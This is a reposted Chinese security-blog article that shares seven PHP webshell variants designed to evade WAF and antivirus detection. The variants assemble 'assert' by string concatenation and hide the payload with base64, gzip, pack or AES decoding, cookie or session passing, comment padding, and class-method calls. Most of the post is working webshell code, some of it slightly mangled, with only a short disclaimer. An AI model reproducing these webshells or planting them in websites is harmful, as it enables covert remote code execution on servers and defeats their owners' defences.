PHP WebShell 免杀分享

admin 2022年11月27日22:21:53安全文章评论12 views1475字阅读4分55秒阅读模式


PHP马作为最常用的上马方式之一,各类waf对其的防护与检测也在不断完善。但是PHP作为一门动态语言,其灵活性很高,刚好最近整理了一些PHP免杀方法,下面来分享一下。

1

字符串拼接

<?php$test = $_GET["test"];$a = "a";$s = "s";$c=$a.$s.$_GET["test"];$c($test);?>

2

Base64

<?php$test = base64_decode($_GET["test"]);#phpinfo()#cGhwaW5mbygp$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c($test);?>

3

函数绕过

gzcompress()

<?php$test = gzuncompress(base64_decode($_GET["test"]));$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c($test);?

pack()

$test=pack("H14","706870696e666f");$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c($test);#assert(phpinfo())

openssl_encrypt

<?php$key = "password";
$test = openssl_decrypt($_GET['test'], 'AES-128-ECB', $key, 0);#加密数据test的值可以通过openssl_encrypt获取$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c($test);

4

传参绕过

Cookie

<?phpsession_start();$a = "a";$s = "s";$c=$a.$s."sert";
$c(base64_decode($_COOKIE["PHPSESSID"]));
?>

通过burp抓包修改PHPSESSID即可


Session

<?phpsession_start();$_SESSION['test']=base64_decode($_COOKIE["PHPSESSID"]);
?>
<?phpsession_start();$a = "a";$s = "s";$c=$a.$s."sert";$c($_SESSION['test']);
?>

5

注释和空白符绕过

<?php$test = $_GET["test"];$a = "a";$s = "s";$c=$a.$s.$_GET["test2"];$c(//);//(    $test//);//);)?>

6

类方法调用

printf("hello world!");<?phpclass a{    testtion demo(){        $a = "a";        $s = "s";        $c=$a.$s."sert";        return $c;    }}
$s = new a();$s->demo()($_GET[1]);

7

类的静态方法

<?phpclass a{    static testtion demo(){        $a = "a";        $s = "s";        $c=$a.$s."sert";        return $c;    }}
a::demo()($_GET[1]);


长风实验室发布、转载的文章中所涉及的技术、思路和工具,仅供以网络安全为目的的学习交流使用,不得用作它途。部分文章来源于网络,如有侵权请联系删除。


END

 推荐 

 阅读 

PHP WebShell 免杀分享
PHP WebShell 免杀分享


点赞在看

扫码关注|更多好玩

 长风实验室 · 

PHP WebShell 免杀分享

原文始发于微信公众号(长风实验室):PHP WebShell 免杀分享

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月27日22:21:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  PHP WebShell 免杀分享 http://cn-sec.com/archives/1428475.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: